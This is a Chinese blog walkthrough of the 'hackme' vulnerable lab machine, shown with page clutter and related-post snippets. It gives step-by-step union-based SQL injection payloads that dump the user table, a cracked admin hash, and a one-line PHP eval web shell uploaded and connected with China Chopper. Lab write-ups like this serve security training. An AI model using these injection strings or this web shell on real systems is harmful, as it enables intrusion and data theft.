hackme靶机

已于 2024-07-29 21:28:08 修改
阅读量189 收藏 1
点赞数 11
文章标签: 运维
于 2024-07-29 21:23:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57524749/article/details/140781124
版权

打开虚拟机切换NAT模式进行端口扫描得到对应的ip地址到网页访问

扫描目录

访问uploads目录的可以看到下面的用户登录然后注册用户

登录我们注册的账号

点击search会出现很多书名

验证sql注入

Windows OS' and 1=1#   正常显示

Windows OS' and 1=2#  显示异常

判断字数段

Windows OS' order by 3#  正常

Windows OS' order by 4#  异常   证明有3列

查看回显位置

-1' union select 1,2,3#

查看库名

-1' union select database(),2,3#

查看表名

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

查看表中所有列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

查看表中的user和password

-1' union select group_concat(user),group_concat(pasword),3 from users#

md5解密

superadmin,2386acb2cf356944177746fc92523983,Uncrackable

登录superadmin用户

创建php文件添加一句话木马<?php @eval ($_POST['cmd']); ?>

打开中国菜刀 连接

这河狸吗.
关注
  • 11
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hackme靶机渗透
m0_50584370的博客
06-01 252
hackme靶机渗透
hackme靶机漏洞解析
m0_59151303的博客
07-29 366
将下载好的靶机拖入到VMware中,填写靶机机名称(随便起一个)和路径虚拟机设置里修改网络状态为NAT模式点击编辑》虚拟网络编辑器做如下箭头点击,可以看到NAT网卡得到所有信息,包括网络地址分配信息通过上述发现,这里我们直从192.168.204.128开始扫描用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.139直接访问什么也没有2、端口扫描使用kali命令扫描nmap -A 192.168.204.139-p-发现开放22和80端口,包括对应的服务。
Hackme靶机 保姆级最详细教程!!!
2401_85783544的博客
07-29 515
最后直接dump,把内容下载下来,我们看到了superadmin超级管理员,他的密码是加密状态,进行解密。2.用御剑扫描一下1-255的端口,发现59和60之间出现了一个奇怪的131,我们可以尝试访问一下,发现登录成功说明131就是靶机的地址.4.输入刚才注册的用户名和密码,可以看到登录进来了,我们输入sql注入语句 ' or 1=1 #9.这个时候我们在访问之前的一个上传目录uploads,可以看到我们上传的6.php。8.我们去直接登录,可以看到上传按钮,这个时候上传一个一句话木马。
Hackme 靶机
weixin_71053667的博客
07-29 361
注册,进入页面,点击search。1.靶机导入,扫描端口。md5解码,解码后结果。查看数据库中所有的表。
hackme靶机攻略
qq_68186313的博客
07-29 603
12选择superadmin对应的密码2386acb2cf356944177746fc92523983并解密。8、已经判断完数据库查询表有3列,那么联合查询3列,查出数据库名。10、联合查询通过内置库查询当前数据库使用的表中的列。2、打开御剑,扫描端口,得到hackme靶机IP。9、联合查询通过内置库查询当前数据库使用的表。5、 到这一步发现可以进行sql注入。7、判断数据库当前查询表有几列。11、查询表中我们需要的数据。15、连接木马并进行系统控制。14、上传一句话木马。
hackme靶机 教程
weixin_57682301的博客
07-29 122
植入成功后再网址中访问2.php 没有报错证明植入成功,打开蚁剑将网址进行绑定,密码为cmd,创建一个文件,成功证明获得shell权限。扫描ip以及目录找到首页注册登录,进行联合查询找到回显点,使用database()找到数据库名称。将上传的改成jpg格式的一句话木马抓包后将后缀名改回为php即可放行。根据列名user和password找出他的用户名密码。在网址中执行上传的1.php,证明上传成功。根据表名users找到表内的列名。再使用相同的方法将下面的木马植入。根据数据库名找到数据库内的表名。
hackme靶机渗透
Tender*的博客
08-02 116
hackme靶机渗透
hackme靶机通关攻略
2301_80402555的博客
09-03 356
输入-1' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='webapphacking' and table_name='users'#输入-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #
Hackme靶机通关攻略
qq_65852138的博客
09-03 334
Hackme靶机通关攻略
HACKME:1靶机
JKding123的博客
10-22 990
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6640
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
HACK ME靶机
qq_49101841的博客
10-01 1197
❀本篇关于信息安全实训时靶场训练的操作笔记。
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 4061
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
828华为云征文|部署全平台实时协作 Markdown 笔记平台 CodiMD
特立独行的博客
09-06 1538
作为一个以Markdown为基础的实时协作笔记平台,CodiMD 不仅能极大提高你的团队协作效率,还能确保所有内容的可控性和自主权。
SQL server 日常运维命令
最新发布
2301_76664379的博客
09-10 1355
【代码】SQL server 日常运维命令。
能源交通行业ITSM案例分析报告
服务创造价值
09-05 863
通过上述分析可以看出,采和科技的ITSM产品组合为能源交通行业提供了高效、可靠的IT运维管理解决方案,不仅满足了设备多样性和分布广泛的需求,而且通过全面监控和智能告警机制,显著提升了系统的稳定性和安全性,帮助企业在数据驱动的基础上实现更高效的运维管理。此外,采和科技的IT资产管理系统(CMDB)通过提供详细的IT资源管理,包括配置拓扑视图,使得IT资产和业务系统之间的关系更加清晰,有助于变更管理和风险评估,从而提高了资产利用率和管理效率。在这种背景下,建设一个高效、规范的数字化运维体系变得尤为迫切。
linux运维常见命令行
wendao76的专栏
09-09 1499
linux常用命令行,用户管理,文件管理, 磁盘管理, 网络管里,进程管理等等
最新版微服务项目搭建
m0_46606920的博客
09-08 1240
最新版微服务搭建,使用nacos,redis,mongodb,gateway,openfeign等技术
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值